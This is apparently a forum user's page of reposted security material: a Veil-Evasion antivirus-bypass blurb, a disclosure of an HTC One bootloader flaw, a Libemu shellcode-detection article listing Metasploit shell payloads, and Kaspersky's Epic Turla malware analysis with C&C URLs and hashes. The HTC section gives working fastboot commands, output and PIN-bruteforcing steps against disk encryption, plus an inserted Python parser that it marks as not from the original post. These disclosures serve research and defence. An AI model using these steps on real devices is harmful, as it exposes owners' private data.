Everything posted by Nytro
-
Veil Framework - Create A Undetected Backdoor

Description: In this video you will learn how to use the Veil Framework for penetration testing. This is a great solution for AV evasion. Nowadays our first challenge is to bypass AV, and this framework is all about AV evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions.

https://www.veil-framework.com/framework/veil-evasion/

Source: Veil Framework - Create A Undetected Backdoor
-
Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password

By cedric » Wednesday 23 July 2014, 11:50 - Forensics

TL;DR

This article deals with the presence of the "read_mmc" command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability has been reported to HTC in February 2014 and has been fixed with the Kit Kat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it would be addressed in operators' ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it.

The "read_emmc" command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly get sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automatic way that would not be possible without it. It opens an additional breach against users that define easily-guessable PIN/passcodes (such as a 4-digit PIN). This is often the case because this same PIN/passcode is also used to unlock the phone on a daily basis. Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption.

The "read_mmc" command appears to be a debug function that is not on every HTC phone. In our opinion, this command should not appear in any released phone. This article details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the "read_mmc" debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user protected data.
Accessing the flash memory

The HTC One is powered down and plugged into our computer. Then it is put in fastboot mode. This can be done by holding the VOL DOWN + POWER buttons, then releasing POWER while holding VOL DOWN. Then, we can switch from HBOOT to fastboot mode. From there, we can use the "fastboot" binary from the Android SDK to read the flash memory. The command has the following format:

```
command format: read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show]
```

The arguments are defined as such:

- first parameter tells where to read from: "emmc" to read the flash, "sd" to read the sdcard
- start: offset (in blocks, i.e. 512-byte units) in the raw flash memory
- #blocks: number of blocks to read
- #blocks/read: number of blocks to read at a time
- show: set to 1 to display the result

An advised user may have noticed it is called "read_mmc" here instead of the older "read_emmc" command, but its purpose is the same. To read the first sector, one can use the following command:

```
$ fastboot oem read_mmc emmc 0 1 1 1
...
(bootloader) reading sector 0 ~ 0
(bootloader) 0
...
(bootloader) 0
(bootloader) DF
(bootloader) FF
(bootloader) 3
(bootloader) 0
(bootloader) 20
(bootloader) E0
(bootloader) 9F
(bootloader) 3
(bootloader) 55
(bootloader) AA
(bootloader) read sector done average = 172
OKAY [  0.310s]
finished. total time: 0.311s
```

We can see it has lots of zeros at the beginning (more than 400 bytes) and it ends with the "55 AA" magic bytes, being the magic for a partition table.

Using an ADB shell on the device, we see the userdata partition is the "mmcblk0p37" block device and starts at the 6422528th sector. It corresponds to the "ext4" mounted partition under Android.

```
shell@android# cat /proc/emmc
dev:        size     erasesize name
...
mmcblk0p37: 680000000 00000200 "userdata"
shell@android:# cat /sys/block/mmcblk0/mmcblk0p37/start
6422528
shell@android:# mount
...
/dev/block/mmcblk0p37 /data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,data=ordered 0 0
```

Consequently, an attacker can use the "read_mmc" command and the previous offset (6422528 and after) in the flash memory to read any sector within the userdata partition, even if the user defined a PIN/passcode to protect his phone.

```
$ fastboot oem read_mmc emmc 6422530 1 1 1
...
(bootloader) reading sector 6422530 ~ 6422530
(bootloader) 0
...
(bootloader) 2F
(bootloader) 64
(bootloader) 61
(bootloader) 74
(bootloader) 61
...
(bootloader) read sector done average = 146
OKAY [  0.359s]
finished. total time: 0.359s
```

The "2F 64 61 74 61" sequence of bytes is the "/data" ASCII string that is located at the beginning of the userdata partition.

As we already detailed in the previous article, the first idea we got was to make a dump of the whole userdata partition from the flash memory. However, it is really slow and it would take several days or even months. As a side note, the HTC One phone does not discharge when in HBOOT/fastboot modes and plugged into a computer. So it is theoretically "easier" to make a whole dump than it was with the HTC Desire Z.

Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One.
Bypassing the Android Full Disk Encryption (FDE)

When working on the HTC Desire Z, there was no "Full Disk Encryption" (FDE) option available because it was Android 2.x at that time, and encryption is not supported before Android 4.x for mobile phones. We decided to analyze whether there was a way to bypass FDE using the "read_mmc" vulnerability.

Thomas Cannon published, back in 2012 at Defcon, his excellent slides showing how FDE works for default Android (based on the Android source code, a.k.a. AOSP) and scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time, he was working on the Google Nexus S, which is a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different with our HTC One, since it is HTC who built it from its own version of modified AOSP and hardware.

We decided to encrypt the device by enabling it in "Storage > Phone storage encryption". After dumping all the partitions and diffing them with a dump we made before encryption, we easily notice the "extra" partition is the FDE header used to store the encrypted master key. As detailed in Thomas' slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for the /data sector decryption (aes-cbc-essiv:sha256).

```
$ hexdump -C extra
00000000  c4 b1 b5 d0 01 00 00 00  68 00 00 00 00 00 00 00  |........h.......|
00000010  20 00 00 00 00 00 00 00  00 00 40 03 00 00 00 00  | .........@.....|
00000020  00 00 00 00 61 65 73 2d  63 62 63 2d 65 73 73 69  |....aes-cbc-essi|
00000030  76 3a 73 68 61 32 35 36  00 00 00 00 00 00 00 00  |v:sha256........|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c  |.............T@.|
00000070  b4 c1 e4 91 69 10 4b 55  2e 47 64 31 13 52 ad 2d  |....i.KU.Gd1.R.-|
00000080  bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00  |..B.............|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39  |..........4....9|
000000b0  0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00  |.J..............|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000200
```

Note: for further details on the master key derivation and data decryption internals, we definitely advise you to have a look at Thomas' slides.

Since we located where the encryption header is, we easily get the offset in the flash memory where it is stored.

```
shell@android# cat /proc/emmc
dev:        size     erasesize name
...
mmcblk0p27: 00010000 00000200 "extra"
shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start
586799
```

Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell it: "This is an encrypted device:)". This is some kind of addition made by HTC for the HTC One specifically. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected.
```
shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64
00000000  54 68 69 73 20 69 73 20  61 6e 20 65 6e 63 72 79  |This is an encry|
00000010  70 74 65 64 20 64 65 76  69 63 65 3a 29 6f c3 a0  |pted device:)o..|
00000020  26 bc 76 ed a8 77 ef 6a  95 28 32 ab 24 ce 8d 58  |&.v..w.j.(2.$..X|
00000030  91 fe 8e 14 9e 81 05 a4  28 65 64 3c 1b e2 11 56  |........(ed<...V|
00000040
```

We can then check that we can access this header and the encrypted userdata partition from the fastboot "read_mmc" command, which is indeed possible.

```
$ fastboot oem read_mmc emmc 586799 1 1 1
```

From this, we can build a small script that will read the FDE header (located in the "extra" partition) and the first sector of the "userdata" partition and bruteforce them locally from our computer.

```
# python bruteforce_htcone_over_reademmc.py
oem read_mmc emmc 6422528 1 1 1
oem read_mmc emmc 586799 1 1 1
Footer File    : extra
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 0
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 256 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400
Salt           : 0xC71F34809709FD390B4A91D9D9D800CD
----------------
Trying to Bruteforce Password... please wait
Found PIN!: 0000
Saving decrypted master key to 'keyfile'
```

We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little bit of time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis.
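As an added example (not the authors' script and not code from the post), here is a Python parser for the two artifacts discussed above: the per-byte "(bootloader) XX" output of read_mmc, and the crypt footer stored in the "extra" partition, rebuilt from the hexdump. It assumes the footer layout and the PBKDF2 parameters of AOSP 4.x as described in Thomas Cannon's slides (the hexdump above is consistent with that layout); the AES unwrap of the master key needs a non-stdlib library and is left out.

```python
import hashlib
import re
import struct

# --- 1. Rebuilding raw bytes from "fastboot oem read_mmc" output ---------------
# The bootloader prints one byte per line as "(bootloader) XX", without a leading
# zero for values below 0x10 (see "(bootloader) 3" in the post's sector-0 dump).
BYTE_LINE = re.compile(r"^\(bootloader\) ([0-9A-Fa-f]{1,2})$")

def parse_read_mmc_output(text):
    """Collect the per-byte lines of a read_mmc dump into a bytes object,
    skipping status lines such as 'reading sector' / 'read sector done'."""
    out = bytearray()
    for line in text.splitlines():
        m = BYTE_LINE.match(line.strip())
        if m:
            out.append(int(m.group(1), 16))
    return bytes(out)

# Constructed sample: the tail of the post's sector-0 dump (end of the MBR).
SAMPLE_READ_MMC = """\
(bootloader) reading sector 0 ~ 0
(bootloader) 0
(bootloader) DF
(bootloader) FF
(bootloader) 3
(bootloader) 0
(bootloader) 20
(bootloader) E0
(bootloader) 9F
(bootloader) 3
(bootloader) 55
(bootloader) AA
(bootloader) read sector done average = 172
OKAY [  0.310s]
"""

# --- 2. Parsing the FDE header found in the "extra" partition -------------------
# Layout of AOSP 4.x's crypt_mnt_ftr (assumption: HTC kept the AOSP layout).
# The 512-byte sector is rebuilt from the post's hexdump ("*" = run of zeros).
EXTRA_SECTOR = (
    bytes.fromhex("c4b1b5d0 0100 0000 68000000 00000000")  # magic, major, minor, ftr_size, flags
    + bytes.fromhex("20000000 00000000 0000400300000000")  # keysize, spare, fs_size (sectors)
    + bytes.fromhex("00000000")                            # failed_decrypt_count
    + b"aes-cbc-essiv:sha256".ljust(64, b"\x00")           # crypto_type_name
    + b"\x00" * 4                                          # padding up to ftr_size (0x68)
    + bytes.fromhex("15d29c161c54401cb4c1e49169104b55"
                    "2e4764311352ad2dbd8c428ed6c48400")    # encrypted master key ({...})
    + b"\x00" * 32                                         # KEY_TO_SALT_PADDING
    + bytes.fromhex("c71f34809709fd390b4a91d9d9d800cd")    # salt ([...])
).ljust(512, b"\x00")

CRYPT_MNT_MAGIC = 0xD0B5B1C4
KEY_TO_SALT_PADDING = 32   # AOSP: the salt sits 32 zero bytes after the key
SALT_LEN = 16
HASH_COUNT = 2000          # PBKDF2 iterations the post mentions (AOSP HASH_COUNT)

def parse_crypt_footer(buf):
    """Decode the fixed header, then locate key and salt via ftr_size/keysize
    rather than hard-coded offsets, so a different footer size still parses."""
    if len(buf) < 0x24 + 64:
        raise ValueError("buffer too short for a crypt footer")
    (magic, major, minor, ftr_size, flags, keysize,
     _spare, fs_size, failed) = struct.unpack_from("<IHHIIIIQI", buf, 0)
    if magic != CRYPT_MNT_MAGIC:
        raise ValueError("bad crypt footer magic 0x%08x" % magic)
    name = buf[0x24:0x24 + 64].split(b"\x00", 1)[0].decode("ascii")
    key_off = ftr_size
    salt_off = key_off + keysize + KEY_TO_SALT_PADDING
    if len(buf) < salt_off + SALT_LEN:
        raise ValueError("buffer too short for key and salt")
    return {
        "version": (major, minor),
        "footer_size": ftr_size,
        "flags": flags,
        "key_bits": keysize * 8,
        "fs_size_bytes": fs_size * 512,   # cross-checks against the /proc/emmc size
        "failed_decrypts": failed,
        "crypto_type": name,
        "encrypted_key": buf[key_off:key_off + keysize],
        "salt": buf[salt_off:salt_off + SALT_LEN],
    }

def derive_key_iv(passcode, salt):
    """PBKDF2-HMAC-SHA1 step of the AOSP scheme: a 16-byte AES key and 16-byte IV
    that unwrap the encrypted master key (parameters assumed from Cannon's
    description of AOSP; the unwrap itself is not performed here)."""
    ikey = hashlib.pbkdf2_hmac("sha1", passcode.encode(), salt, HASH_COUNT, 32)
    return ikey[:16], ikey[16:]

if __name__ == "__main__":
    print(parse_read_mmc_output(SAMPLE_READ_MMC).hex())
    ftr = parse_crypt_footer(EXTRA_SECTOR)
    for k, v in ftr.items():
        print("%-16s %s" % (k, v.hex() if isinstance(v, bytes) else v))
```

The fs_size field (0x3400000 sectors) decodes to exactly the 0x680000000 bytes that /proc/emmc reports for mmcblk0p37, a cheap sanity check that a recovered header really belongs to that userdata partition.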
The PIN/passcode set up by the user is used for both:

(1) decrypting the phone when it is switched on
(2) accessing the phone after a given delay during regular daily use

Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one with digits and letters) makes sense. Moreover, encrypting a phone using schemes instead of a PIN/password is not supported in Android for now. We can add that it would not help against bruteforce since the scheme is stored as a sequence of numbers that do not repeat.

Mounting the userdata encrypted partition (remotely over USB)

Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and enter the found PIN/passcode to bypass the lock screen. Then, he is able to enable ADB and dump everything he wants. We do not need to go further. However, for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.60 in order to support the plain type), specifying the "plain" type, the decryption algorithm (aes-cbc-essiv:sha256) and the "keyfile" holding our previously decrypted master key.

```
# mkdir mnt
# losetup /dev/loop0 userdata.img
# cryptsetup --type plain open -c aes-cbc-essiv:sha256 -d keyfile /dev/loop0 userdata
# mount /dev/mapper/userdata mnt
```

In our case, we can "even" do it over USB using the "read_mmc" command. All the tools to replay these scenarios are released in our github repository.
Again, we would like to thank the HTC security team for their support and for patching this vulnerability in the Kit Kat upgrade.

Source: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab
-
Shellcode Detection and Emulation with Libemu

Introduction

Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/honeypot systems for emulating x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, to analyze shellcode inside malicious .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using GetPC heuristics, as we will see later in the article.

The very first thing we can do is download Libemu via Git with the following command:

```
# git clone git://git.carnivore.it/libemu.git
```

If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 ANSI C code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it's evident that about 50k lines of code have been written.

The installation instructions can be found at [1], which is why we won't describe them in this article. We can also install Pylibemu, so we can interact with Libemu directly from Python.

Creating the Shellcode

Let's create a simple test case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, which is a command-line tool specifically built to generate and output various versions of shellcode. Let's first present all Linux payloads by grepping for the "linux" keyword through the msfpayload command output.
```
# msfpayload -l 2>&1 | grep linux
linux/armle/adduser                      Create a new user with UID 0
linux/armle/exec                         Execute an arbitrary command
linux/armle/shell/bind_tcp               Listen for a connection, dup2 socket in r12, then execve
linux/armle/shell/reverse_tcp            Connect back to the attacker, dup2 socket in r12, then execve
linux/armle/shell_bind_tcp               Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp            Connect back to attacker and spawn a command shell
linux/mipsbe/shell_reverse_tcp           Connect back to attacker and spawn a command shell
linux/mipsle/shell_bind_tcp              Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp           Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/ppc/shell_find_port                Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp               Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port              Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp            Connect back to attacker and spawn a command shell
linux/x86/exec                           Execute an arbitrary command
linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port
linux/x86/shell_find_port                Spawn a shell on an established connection
linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/x86/adduser                        Create a new user with UID 0
linux/x86/chmod                          Runs chmod on specified file with specified mode
linux/x86/exec                           Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp      Listen for a connection over IPv6, Staged meterpreter server
linux/x86/meterpreter/bind_nonx_tcp      Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/bind_tcp           Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/find_tag           Use an established connection, Staged meterpreter server
linux/x86/meterpreter/reverse_ipv6_tcp   Connect back to attacker over IPv6, Staged meterpreter server
linux/x86/meterpreter/reverse_nonx_tcp   Connect back to the attacker, Staged meterpreter server
linux/x86/meterpreter/reverse_tcp        Connect back to the attacker, Staged meterpreter server
linux/x86/metsvc_bind_tcp                Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp             Stub payload for interacting with a Meterpreter Service
linux/x86/read_file                      Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp            Listen for a connection over IPv6, Spawn a command shell (staged)
linux/x86/shell/bind_nonx_tcp            Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/find_tag                 Use an established connection, Spawn a command shell (staged)
linux/x86/shell/reverse_ipv6_tcp         Connect back to attacker over IPv6, Spawn a command shell (staged)
linux/x86/shell/reverse_nonx_tcp         Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_ipv6_tcp            Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port
linux/x86/shell_find_port                Spawn a shell on an established connection
linux/x86/shell_find_tag                 Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2             Connect back to attacker and spawn a command shell
```

Full article: Shellcode Detection and Emulation with Libemu - InfoSec Institute
-
Worth listening to. "Ennnumereitor"
-
The Epic Turla Operation

Solving some of the mysteries of Snake/Uroburos

By GReAT on August 7, 2014.

Technical Appendix with IOCs

Executive Summary

Over the last 10 months, Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call "Epic Turla". The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies.

The attacks are known to have used at least two zero-day exploits:

- CVE-2013-5065 - Privilege escalation vulnerability in Windows XP and Windows 2003
- CVE-2013-3346 - Arbitrary code-execution vulnerability in Adobe Reader

We also observed exploits against older (patched) vulnerabilities, social engineering techniques and watering hole strategies in these attacks. The primary backdoor used in the Epic attacks is also known as "WorldCupSec", "TadjMakhal", "Wipbot" or "Tavdig".

When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to "rescue" each other if communications are lost with one of the backdoors.

Once the attackers obtain the necessary credentials without the victim noticing, they deploy the rootkit and other extreme persistence mechanisms. The attacks are still ongoing as of July 2014, actively targeting users in Europe and the Middle East.

Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services subscribers.
Contact: intelreports@kaspersky.com

The Epic Turla attacks

The attacks in this campaign fall into several different categories depending on the vector used in the initial compromise:

- Spearphishing e-mails with Adobe PDF exploits (CVE-2013-3346 + CVE-2013-5065)
- Social engineering to trick the user into running malware installers with ".SCR" extension, sometimes packed with RAR
- Watering hole attacks using Java exploits (CVE-2012-1723), Flash exploits (unknown) or Internet Explorer 6,7,8 exploits (unknown)
- Watering hole attacks that rely on social engineering to trick the user into running fake "Flash Player" malware installers

The attackers use both direct spearphishing and watering hole attacks to infect their victims. Watering holes (waterholes) are websites of interest to the victims that have been compromised by the attackers and injected to serve malicious code.

So far we haven't been able to locate any e-mail used against the victims, only the attachments. The PDF attachments do not show any "lure" to the victim when opened; however, the SCR packages sometimes show a clean PDF upon successful installation.

Some of the known attachment names used in the spearphishing attacks are:

- ???? ????.rar (translation from Arabic: "Geneva conference.rar")
- NATO position on Syria.scr
- Note_?107-41D.pdf
- Talking Points.scr
- border_security_protocol.rar
- Security protocol.scr
- Program.scr

In some cases, these filenames can provide clues about the type of victims the attackers are targeting.

The watering hole attacks

Currently, the Epic attackers run a vast network of watering holes that target visitors with surgical precision. Some of the injected websites include:

- The website of the City Hall of Pinor, Spain
- A site promoting entrepreneurship in the border area of Romania
- Palestinian Authority Ministry of Foreign Affairs

In total, we observed more than 100 injected websites. Currently, the largest number of injected sites is in Romania.
Here's a statistic on the injected websites:

The distribution is obviously not random, and it reflects some of the interests of the attackers. For instance, in Romania many of the infected sites are in the Mures region, while many of the Spanish infected sites belong to local governments (City Hall).

Most of the infected sites use the TYPO3 CMS (see: TYPO3 - The Enterprise Open Source CMS), which could indicate the attackers are abusing a specific vulnerability in this publishing platform.

Injected websites load a remote JavaScript into the victim's browser:

The script "sitenavigatoin.js" is a Pinlady-style browser and plugin detection script, which in turn redirects to a PHP script sometimes called main.php or wreq.php. Sometimes, the attackers register the .JPG extension with the PHP handler on the server, using "JPG" files to run PHP scripts:

Profiling script

The main exploitation script "wreq.php", "main.php" or "main.jpg" performs a number of tasks. We have located several versions of this script which attempt various exploitation mechanisms. One version of this script attempts to exploit Internet Explorer versions 6, 7 and 8:

Internet Explorer exploitation script

Unfortunately, the Internet Explorer exploits have not yet been retrieved.
Another more recent version attempts to exploit Oracle Sun Java and Adobe Flash Player:

Java and Flash Player exploitation scripts

Although the Flash Player exploits couldn't be retrieved, we did manage to obtain the Java exploits:

Name          MD5
allj.html     536eca0defc14eff0a38b64c74e03c79
allj.jar      f41077c4734ef27dec41c89223136cf8
allj64.html   15060a4b998d8e288589d31ccd230f86
allj64.jar    e481f5ea90d684e5986e70e6338539b4
lstj.jar      21cbc17b28126b88b954b3b123958b46
lstj.html     acae4a875cd160c015adfdea57bd62c4

The Java files exploit a popular vulnerability, CVE-2012-1723, in various configurations. The payload dropped by these Java exploits is the following:

MD5: d7ca9cf72753df7392bfeea834bcf992

The Java exploits use a special loader that attempts to inject the final Epic backdoor payload into explorer.exe. The backdoor extracted from the Java exploits has the following C&C hardcoded inside:

www.arshinmalalan[.]com/themes/v6/templates/css/in.php

This C&C is still online at the moment, although it redirects to a currently suspended page at "hxxp://busandcoachdirectory.com[.]au". For a full list of C&C servers, please see the Appendix.

The Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment. Most recently, we observed them using yet another technique coupled with watering hole attacks.
This takes advantage of social engineering to trick the user into running a fake Flash Player (MD5: 030f5fdb78bfc1ce7b459d3cc2cf1877):

In at least one case, they tried to trick the user into downloading and running a fake Microsoft Security Essentials app (MD5: 89b0f1a3a667e5cd43f5670e12dba411):

The fake application is signed by a valid digital certificate from Sysprint AG:

Serial number: 00 c0 a3 9e 33 ec 8b ea 47 72 de 4b dc b7 49 bb 95
Thumbprint: 24 21 58 64 f1 28 97 2b 26 22 17 2d ee 62 82 46 07 99 ca 46

Valid signature from Sysprint AG on Epic dropper

This file was distributed from the Ministry of Foreign Affairs of Tajikistan's website, at "hxxp://mfa[.]tj/upload/security.php".

The file is a .NET application that contains an encrypted resource. This drops the malicious file with the MD5 7731d42b043865559258464fe1c98513. This is an Epic backdoor which connects to the following C&Cs, with a generic internal ID of 1156fd22-3443-4344-c4ffff:

hxxp://homaxcompany[.]com/components/com_sitemap/
hxxp://www.hadilotfi[.]com/wp-content/themes/profile/

A full list with all the C&C server URLs that we recovered from the samples can be found in the technical Appendix.

The Epic command-and-control infrastructure

The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality. The huge network commanded by the Epic Turla attackers serves multiple purposes. For instance, the motherships function as both exploitation sites and command and control panels for the malware.

Here's what the big picture looks like:

Epic Turla lifecycle

The first level of command and control proxies generally talk to a second level of proxies, which in turn talk to the "mothership" server. The mothership server is generally a VPS, which runs the Control panel software used to interact with the victims. The attackers operate the mothership using a network of proxies and VPN servers for anonymity reasons.
The motherships also work as the exploitation servers used in the watering hole attacks, delivering Java, IE or fake applications to the victim.

We were able to get a copy of one of the motherships, which provided some insight into the operation. It runs a control panel which is password protected:

Epic mothership control panel login

Once logged into the Control panel, the attackers can see a general overview of the system including the number of interesting potential targets:

Epic control panel status overview

A very interesting file on the servers is task.css, where the attackers define the IP ranges they are interested in. To change the file, they are using the "Task editor" from the menu. Depending on the "tasks", they will decide whether to infect the visitors or not. In this case, we found they targeted two ranges belonging to:

- "Country A" - Federal Government Network
- "Country B" - Government Telecommunications and Informatics Services Network

It should be noted though that the fact that the attackers were targeting these ranges doesn't necessarily mean they also got infected. Some other unknown IPs were also observed in the targeting schedules.

There is also an "except.css" file where the attackers log the reasons they didn't try to exploit certain visitors. There are three possible values:

- TRY
- DON'T TRY -> Version of the browser and OS does not meet the conditions
- DON'T TRY -> (2012-09-19 10:02:04) - checktime

These are the "don't meet the conditions" reasons observed in the logs:

Windows 7 or 2008 R2
MSIE 8.0
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E)
Adobe Shockwave 11.5.1.601
Adobe Flash 10.3.181.14
Adobe Reader 10.1.0.0
Win Media Player 12.0.7601.17514
Quick Time null
MS Word null
Java null

The Epic / Tavdig / Wipbot backdoor

For this first stage of the attack, the threat actor uses a custom backdoor.
In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult.

The CVE-2013-5065 exploit allows the backdoor to achieve administrator privileges on the system and run unrestricted. This exploit only works on unpatched Microsoft Windows XP systems.

Other known detection names for the backdoor are Trojan.Wipbot (Symantec) or Tavdig.

The main backdoor is about 60KB in size and implements a C&C protocol on top of normal HTTP requests. The communication protocol uses requests in the C&C replies, which the malware decrypts and processes. The replies are sent back to the C&C through the same channel.

The malware behavior is defined by a configuration block. The configuration block usually contains two hard-coded C&C URLs. We have also seen one case where the configuration block contains just one URL. The configuration can also be updated on the fly by the attackers, via the C&C.

The backdoor attempts to identify the following processes and, if found, it will terminate itself:

- tcpdump.exe
- windump.exe
- ethereal.exe
- wireshark.exe
- ettercap.exe
- snoop.exe
- dsniff.exe

It contains an internal unique ID, which is used to identify the victim to the C&C. Most samples, especially old ones, have the ID 1156fd22-3443-4344-c4ffff. Once a victim is confirmed as "interesting", the attackers upload another Epic backdoor which has a unique ID used to control this specific victim.

During the first C&C call, the backdoor sends a pack with the victim's system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware.

Through monitoring, we were able to capture a large amount of commands sent to the victims by the attackers, providing a unique view into this operation.
Here's a look at one of the encrypted server replies:

Once a victim is infected and "checks in" with the server, the attackers send a template of commands:

Next, the attackers try to move through the victim's network using pre-defined or collected passwords:

Listing all .doc files recursively is also a common "theme":

In total, we have decoded several hundreds of these command packages delivered to the victims, providing a unique insight into the inner workings of the attackers. In addition to generic searches, some very specific lookups have been observed as well. These include searches for:

- *NATO*.msg
- eu energy dialogue*.*
- EU*.msg
- Budapest*.msg

In this case, the attackers were interested in finding e-mails related to "NATO", "Energy Dialogue within European Union" and so on.

For some of the C&C servers, the attackers implemented RSA encryption for the C&C logs, which makes it impossible to decrypt them. This scheme was implemented in April 2014.

Lateral movement and upgrade to more sophisticated backdoors

Once a victim is compromised, the attackers upload several tools that are used for lateral movement. One such tool observed in the attacks and saved as "C:\Documents and Settings\All users\Start Menu\Programs\Startup\winsvclg.exe" is:

Name: winsvclg.exe
MD5: a3cbf6179d437909eb532b7319b3dafe
Compiled: Tue Oct 02 13:51:50 2012

This is a keylogger tool that creates %temp%\~DFD3O8.tmp. Note: the filename can change across victims. On one Central Asian government's Ministry of Foreign Affairs victim system, the filename used was "adobe32updt.exe".

In addition to these custom tools, we observed the usage of standard administration utilities.
For instance, another tool often uploaded by the attackers to the victim's machine is "winrs.exe":

Name: winrs.exe
MD5: 1369fee289fe7798a02cde100a5e91d8

This is a UPX-packed binary, which contains the genuine "dnsquery.exe" tool from Microsoft, unpacked MD5: c0c03b71684eb0545ef9182f5f9928ca.

In several cases, an interesting update has been observed -- malware from a different, yet related family.

Size: 275,968 bytes
MD5: e9580b6b13822090db018c320e80865f
